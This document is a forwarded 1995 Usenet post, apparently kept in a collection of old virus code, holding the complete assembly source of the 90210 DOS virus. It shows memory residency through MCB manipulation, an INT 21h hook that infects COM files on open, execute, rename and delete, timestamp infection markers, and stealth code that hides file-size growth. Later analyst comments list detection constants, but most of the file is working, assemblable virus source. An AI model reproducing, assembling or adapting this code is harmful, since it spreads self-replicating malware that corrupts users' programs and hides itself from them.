
📄 90210.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
From smtp Tue Feb  7 13:13 EST 1995
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue,  7 Feb 95 13:13 EST
Received: by lynx.dac.neu.edu (8.6.9/8.6.9) 
     id NAA30823 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:16:19 -0500
Date: Tue, 7 Feb 1995 13:16:19 -0500
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
Content-Length: 8866
Content-Type: text
Message-Id: <199502071816.NAA30823@lynx.dac.neu.edu>
To: pobox.jwu.edu!joshuaw 
Subject: (fwd) 90210
Newsgroups: alt.comp.virus
Status: O

Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!usenet.cis.ufl.edu!caen!uwm.edu!news.alpha.net!solaris.cc.vt.edu!uunet!ankh.iia.org!danishm
From: danishm@iia.org ()
Newsgroups: alt.comp.virus
Subject: 90210
Date: 5 Feb 1995 21:55:07 GMT
Organization: International Internet Association.
Lines: 345
Message-ID: <3h3hfr$sb@ankh.iia.org>
NNTP-Posting-Host: iia.org
X-Newsreader: TIN [version 1.2 PL2]

Here is the 90210 virus:

;90210 Virus from the TridenT virus research group.

;This is a semi-stealth virus that hides file-size changes while
;it is in memory.  It marks the files w/the timestamp.  It will
;infect COM files on open, execute, delete, and rename.  It checks
;if it is in memory by calling Int 21h with DEADh in AX and uses MCB's
;to go memory resident.

;Disassembly by Black Wolf

.model tiny  
.code

		org     100h
  
;-----------------------------------------------------------------------
; start: code that runs first in an infected COM file
; (16-bit real-mode DOS, TASM-style syntax).
;
; Analyst summary of what the visible instructions do:
;   1. Compute BP = run-time address of 'start' with a call/pop pair.
;   2. Residency check: INT 21h with AX=0DEADh; a resident copy answers
;      AX=0AAAAh (see Int21Handler).
;   3. If not resident and the MCB in front of this program is the last
;      one in the chain ('Z'): shrink it by 38h paragraphs, lower the
;      word at MCB:[12h] (= PSP:[2], top of memory) by the same amount,
;      copy 287h bytes of this body to that segment and point the
;      INT 21h vector at Int21Handler there.
;   4. Copy the three bytes kept in Storage_Bytes back to CS:100h and
;      return to 100h with the AX value the program was started with.
;
; Detection-relevant constants on this page: the 0DEADh/0AAAAh
; handshake, the 287h body length, and the 38h-paragraph drop in the
; last MCB together with PSP:[2].
;-----------------------------------------------------------------------
start:
		push    ax                      ;entry AX, popped again before 'retn'
		call    GetOffset

GetOffset:
		pop     bp                      ;bp = run-time address of GetOffset
		sub     bp,offset GetOffset-start ;bp = run-time address of 'start'

		mov     ax,0DEADh
		int     21h                     ;Are we installed?
		cmp     ax,0AAAAh 
		je      DoneInstall

		mov     ax,3521h
		int     21h                     ;Get int 21 address
			   
    ; The next two lines are raw opcode bytes from the disassembly; the
    ; trailing comment is their decoding. They save ES:BX (the vector
    ; just read) into the OldInt21 far pointer of this copy.
    db      2eh, 89h,9eh,77h,0h     ;mov cs:[OldInt21-start+bp],bx
    db      2eh, 8ch, 86h, 79h, 0   ;mov word ptr cs:[OldInt21-start+2+bp],es

		; DS = CS-1: the paragraph directly below the program segment,
		; which the code treats as this program's memory control block.
		mov     ax,cs
		dec     ax
		mov     ds,ax
		cmp     byte ptr ds:[0],'Z'
		jne     DoneInstall         ;Are we the last block in chain?
		
		mov     ax,ds:[3]               ;Get MCB size
		sub     ax,38h                  ;subtract virus memory size
		jc      DoneInstall             ;exit if virus > MCB

		mov     ds:[3],ax               ;Set MCB size
		;sub     word ptr ds:[12h],38h  ;Subtract virus mem from 
		db      81h,2eh,12h,0,38h,0     ;top of memory in PSP
		
		; Copy 287h bytes from CS:BP (this body) to offset 0 of the
		; segment now named by the lowered top-of-memory word.
		mov     si,bp
		mov     di,0
		mov     es,ds:[12h]             ;Get top of memory from PSP
		push    cs
		pop     ds
		mov     cx,287h
		cld          
		rep     movsb                   ;Copy virus into memory
		
		; DS:DX = new segment : Int21Handler; offsets are relative to
		; 'start' because the resident copy begins at offset 0.
		mov     ax,2521h        
		push    es
		pop     ds
		mov     dx,offset Int21Handler-start
		int     21h                     ;Set int 21h
			   
DoneInstall:
		; Put the host's original first three bytes back at CS:100h
		; (movsw + movsb = 3 bytes), then return to 100h.
		mov     di,100h
		lea     si,[bp+Storage_Bytes-start]
		push    cs
		push    cs
		pop     ds
		pop     es
		cld 
		movsw
		movsb                           ;Restore Host file.
		mov     bx,offset start
		pop     ax                      ;AX as it was on entry
		push    bx                      ;return address for the 'retn' below
		retn                            ;Return to Host

  
; ASCII marker stored inside the body; not referenced by any instruction
; visible in this listing. Usable as a static signature string.
VirusName       db      '[90210 BH]'
		
; Far pointer (offset word, then segment word) to the INT 21h handler
; that was installed before this code hooked the vector. Filled in by
; 'start' and used by every pushf / call dword ptr cs:[OldInt21-start].
OldInt21:                
		dw      0                
		dw      0
		
;-----------------------------------------------------------------------
; Int21Handler: resident INT 21h hook, dispatching on AX/AH.
;   AX=0DEADh            -> answer AX=0AAAAh and return (residency probe)
;   AH=11h/12h           -> FCBStealth   (FCB directory search)
;   AH=4Eh/4Fh           -> HandleStealth (handle directory search)
;   AH=3Dh,41h,43h,56h,
;   AX=4B00h             -> SetupNameCheck (file name taken from DS:DX)
;   AH=0Fh,23h           -> TryToInfect (file name taken from an FCB)
;   anything else        -> ExitInfect (forwarded to the old handler)
; The registers pushed below are popped again at ExitInfect.
; For monitoring: the probe value 0DEADh and the reply 0AAAAh are the
; in-memory indicator this page gives for a resident copy.
;-----------------------------------------------------------------------
Int21Handler:
		cmp     ax,0DEADh               ;Install Check?
		jne     NotInstall   
		mov     ax,0AAAAh
		iret 
NotInstall:

		; Directory searches are handled before any register is saved;
		; those paths call the old handler themselves.
		cmp     ah,11h                  ;FCB find first
		je      FCBSearch
		cmp     ah,12h                  ;FCB find next
		je      FCBSearch
		cmp     ah,4Eh                  ;handle find first
		je      HandleSearch
		cmp     ah,4Fh                  ;handle find next
		je      HandleSearch
		
		; Multi-operand push (TASM syntax); matched by the pop at ExitInfect.
		push    ax bx cx dx si di bp ds es

		cmp     ah,3Dh                  ;handle file open
		je      SetupNameCheck
		cmp     ax,4B00h                ;file execute
		je      SetupNameCheck
		cmp     ah,41h                  ;handle file delete
		je      SetupNameCheck
		cmp     ah,43h                  ;get/set attributes
		je      SetupNameCheck
		cmp     ah,56h                  ;rename file
		je      SetupNameCheck
		
		cmp     ah,0Fh                  ;Open file w/FCB
		je      TryToInfect
		cmp     ah,23h
		je      TryToInfect             ;Get file size
		jmp     ExitInfect
		
; Trampolines: near jumps to the stealth routines further down.
FCBSearch:
		jmp     FCBStealth
HandleSearch:
		jmp     HandleStealth

;-----------------------------------------------------------------------
; TryToInfect / SetupNameCheck / Find_Extension / CheckFilename
; Entered from Int21Handler with the caller's registers already pushed.
;   TryToInfect    : DS:DX is read as an FCB; 8 name bytes and 3
;                    extension bytes starting at DS:DX+1 are copied into
;                    the Filename / Extension buffers, then DS:DX is
;                    pointed at that buffer.
;   SetupNameCheck : scans at most 100h bytes from DS:DX for '.', then
;                    accepts the name only if the next three characters,
;                    lower-cased, are "com".
; Falls through to InfectFile on a match, else to ExitInfect.
; Several jumps here are raw opcode bytes with fixed displacements; the
; trailing comment on each gives the disassembler's decoding.
;-----------------------------------------------------------------------
TryToInfect:
		db      89h,0d6h         ;mov     si,dx

		inc     si                      ;start one byte past DS:DX (presumably the FCB drive byte - confirm)
		push    cs
		pop     es
		mov     di,offset ds:[Filename-start]     ;Copy filename
		mov     cx,8
		rep     movsb
		mov     cx,3
		inc     di                      ;step over the '.' already stored in the buffer
		rep     movsb

		mov     dx,Filename-start
		push    cs
		pop     ds                      ;DS:DX -> rebuilt "name.ext" buffer

SetupNameCheck:
		db      89h, 0d6h        ;mov     si,dx
		mov     cx,100h                 ;upper bound on bytes scanned for '.'
		cld 
  
Find_Extension:
		lodsb
		cmp     al,'.'                  ;Find '.'
		je      CheckFilename
		loop    Find_Extension
		db      0e9h, 13h, 0             ;jmp     FilenameBad
CheckFilename:
		lodsw 
		or      ax,2020h                ;Set to lowercase
		cmp     ax,6F63h                ;Is it a com file?
		jne     FilenameBad
		lodsb        
		or      al,20h
		cmp     al,6Dh                  ;'m'
		jne     FilenameBad
		db      0e9h, 3, 0              ;jmp     InfectFile 

FilenameBad:
		jmp     ExitInfect 

;-----------------------------------------------------------------------
; InfectFile .. ExitInfect: file-modification path of the INT 21h hook.
; Entered with DS:DX -> file name. All DOS calls except one are made as
; pushf / call far through OldInt21, i.e. straight to the previous
; handler.
;
; On-disk artefacts produced by this path (useful for triage/scanning):
;   * file grows by 287h bytes, appended at the old end of file;
;   * first three bytes become 0E9h + (old length - 3), a near jump to
;     the appended body;
;   * low five bits of the DOS time word are all set (1Fh); this is the
;     marker tested here and in the stealth routines;
;   * the date and the rest of the time word are written back unchanged;
;   * files whose first word is 5A4Dh or 4D5Ah are left unmodified.
;-----------------------------------------------------------------------
InfectFile:
		push    dx                      ;keep DS:DX (file name) for the
		push    ds                      ;attribute restore further down
		mov     ax,4300h
		pushf         
		call    dword ptr cs:[OldInt21-start]      ;Get Attributes
		mov     word ptr cs:[FileAttribs-start],cx ;Save them
		
		mov     ax,4301h
		xor     cx,cx
		pushf           
		call    dword ptr cs:[OldInt21-start]     ;Reset Attribs to 0
		
		mov     ax,3D02h
		pushf
		call    dword ptr cs:[OldInt21-start]     ;Open file
		jnc     OpenGood
		jmp     FileClosed

OpenGood:
		xchg    ax,bx                   ;bx = file handle for the calls below
		mov     ax,5700h
		pushf              
		call    dword ptr cs:[OldInt21-start]      ;Get file time/date
		mov     word ptr cs:[FileTime-start],cx  ;save time
		mov     word ptr cs:[FileDate-start],dx  ;save date

		and     cx,1Fh                  ;isolate the low five bits of the time word
		cmp     cx,1Fh                  ;all set = marker already present
		jne     NotInfected                    ;Check infection
		db      0e9h, 76h, 0                   ;jmp     Close_File
NotInfected:
		mov     ah,3Fh                  
		push    cs
		pop     ds
		mov     dx,Storage_Bytes-start
		mov     cx,3
		pushf                          
		call    dword ptr cs:[OldInt21-start] ;Read in first 3 bytes

		cmp     word ptr cs:[Storage_Bytes-start],5A4Dh    
		je      DoneWithFile        ;Is it an .EXE file?

		cmp     word ptr cs:[Storage_Bytes-start],4D5Ah
		je      DoneWithFile        ;Alternate EXE sig?

		mov     ax,4202h
		xor     cx,cx
		xor     dx,dx
		pushf        
		call    dword ptr cs:[OldInt21-start] ;Go end of file.
		
		; Only AX (low word of the end-of-file position) is used.
		sub     ax,3                        ;Save jump size
		mov     word ptr cs:[Jump_Bytes-start+1],ax
		
		; DS:DX = CS:0, the start of the resident copy; 287h bytes.
		mov     ah,40h                  
		push    cs
		pop     ds
		mov     dx,0
		mov     cx,287h
		pushf          
		call    dword ptr cs:[OldInt21-start] ;Append virus to file
		
		; This one call is a plain INT 21h, so it passes through
		; Int21Handler again; AH=42h matches none of the hooked
		; functions there and is forwarded to the old handler.
		mov     ax,4200h
		xor     cx,cx
		xor     dx,dx
		int     21h                          ;go back to beginning
			   
		mov     ah,40h                  
		mov     dx,Jump_Bytes-Start
		mov     cx,3
		pushf        
		call    dword ptr cs:[OldInt21-start]      ;Write in jump
		or      word ptr cs:[FileTime-start],1Fh ;Mark as infected

DoneWithFile:
		mov     ax,5701h
		mov     cx,word ptr cs:[FileTime-start]   
		mov     dx,word ptr cs:[FileDate-start]   
		pushf                               
		call    dword ptr cs:[OldInt21-start] ;Restore File Date/Time

Close_File:
		mov     ah,3Eh
		pushf          
		call    dword ptr cs:[OldInt21-start] ;Close file
		
		; Re-read the saved file-name pointer but leave it on the
		; stack, so FileClosed can pop it on every path.
		pop     ds
		pop     dx                          ;Pop filename address
		push    dx
		push    ds
		mov     ax,4301h
		; NOTE(review): this load goes through DS, which was reloaded
		; from the stack two instructions earlier, while the save above
		; wrote through CS. The value written back may therefore differ
		; from the saved attributes - treat attributes as unreliable
		; when examining affected files; confirm on a sample.
		mov     cx,ds:[FileAttribs-start]
		pushf             
		call    dword ptr cs:[OldInt21-start]    ;Restore attributes

FileClosed:
		pop     ds
		pop     dx

ExitInfect:
		; Undo the push made in Int21Handler, then hand the caller's
		; original request to the previous handler.
		pop     es ds bp di si dx cx bx ax
		jmp     dword ptr cs:[OldInt21-start]  ;Jump back into Int 21h
  
;-----------------------------------------------------------------------
; GetDTA: helper for the stealth routines.
; Takes its own return address off the stack into SI, pushes the flags,
; AX, BX and ES, issues AH=2Fh through the old handler and jumps back
; via SI. The four pushed values therefore remain on the caller's stack
; and are removed at DoneFCBStealth (pop es bx ax / popf).
; Out: the stealth routines use ES:BX afterwards as the DTA address.
; Clobbers: SI, AX, BX, ES.
;-----------------------------------------------------------------------
GetDTA:
		pop     si                      ;si = return address
		pushf
		push    ax bx es
		mov     ah,2Fh
		call    CallInt21
		jmp     si                      ;return without touching the stack again

;-----------------------------------------------------------------------
; FCBStealth / HandleStealth: size hiding for directory searches.
; Both first let the old handler perform the search. If it succeeded
; and the low five bits of the entry's time byte at [bx+16h] equal 1Fh
; (the marker set by InfectFile), 287h is subtracted from the 32-bit
; size field in the search result and bit 4 of that time byte is
; flipped, so callers see the pre-modification size.
;   FCB search    : size at [bx+1Ch]/[bx+1Eh]; bx is advanced by 8 first
;                   when the buffer starts with 0FFh (extended FCB).
;   handle search : size at [bx+1Ah]/[bx+1Ch].
; Consequence for responders: while the hook is resident, directory
; listings on the affected machine under-report the size of marked
; files; compare sizes from a clean boot.
;-----------------------------------------------------------------------
FCBStealth:
		call    CallInt21
		cmp     al,0                    ;Did call work?
		jne     NoStealth
		call    GetDTA
		cmp     byte ptr es:[bx],0FFh   ;Extended FCB?
		jne     AfterFCBAdjust
		add     bx,8

AfterFCBAdjust:
		mov     al,es:[bx+16h]          ;Get time stamp
		and     al,1Fh
		cmp     al,1Fh                  ;infected?
		jne     DoneFCBStealth

		sub     word ptr es:[bx+1Ch],287h ;Subtract virus size
		sbb     word ptr es:[bx+1Eh],0    ;adjust for carry
		jmp     short ResetTime

HandleStealth:
		call    CallInt21
		jc      NoStealth 
		call    GetDTA      
		mov     al,es:[bx+16h]              ;Get file time
		and     al,1Fh
		cmp     al,1Fh
		jne     DoneFCBStealth
		sub     word ptr es:[bx+1Ah],287h   ;Subtract virus size
		sbb     word ptr es:[bx+1Ch],0      ;adjust for carry

ResetTime:
		; Flips bit 4 only: a low-five-bit value of 1Fh becomes 0Fh.
		xor     byte ptr es:[bx+16h],10h    ;Restore time to norm.

DoneFCBStealth:
		; Remove what GetDTA left on the stack (es, bx, ax, flags).
		pop     es bx ax
		popf
  
NoStealth:
		; Far return that also drops the flags word pushed by the
		; caller's INT, so the current flags are what the caller sees.
		retf    2 

;-----------------------------------------------------------------------
; CallInt21: call the previously installed INT 21h handler.
; pushf followed by a far call through OldInt21 builds the same stack
; frame an INT instruction would, so the old handler's return lands on
; the 'retn' below.
; In/Out: registers are whatever the requested DOS function uses.
;-----------------------------------------------------------------------
CallInt21:
		pushf
		call    dword ptr cs:[OldInt21-start]
		retn

; Three-byte slot (nop + int 21h assemble to 3 bytes in this listing).
; InfectFile reads a file's first three bytes into it, and 'start'
; copies it back to CS:100h before returning to the host.
Storage_Bytes:                
		nop
		int     21h
		
; Scratch buffer for a name rebuilt from an FCB by TryToInfect:
; 8 name bytes, a fixed '.', 3 extension bytes, terminating zero.
Filename        db      8 dup (0)
		db      '.'
Extension       db      3 dup (0)
		db      0

; Values saved by InfectFile while it works on a file.
FileAttribs     dw      0
FileTime        dw      0
FileDate        dw      0

; Opcode 0E9h followed by a 16-bit displacement that InfectFile fills in
; (old file length - 3) before writing these bytes to the file start.
Jump_Bytes      db      0E9h, 00h, 00h

; ASCII string stored at the end of the body; not referenced by any
; instruction visible in this listing. Usable as a static signature.
AuthorName      db      ' John Tardy / TridenT '

end     start


--
Eric "Mad Dog" Kilby                                 maddog@ccs.neu.edu
The Great Sporkeus Maximus			     ekilby@lynx.dac.neu.edu
Student at the Northeastern University College of Computer Science 
"I Can't Believe It's Not Butter"
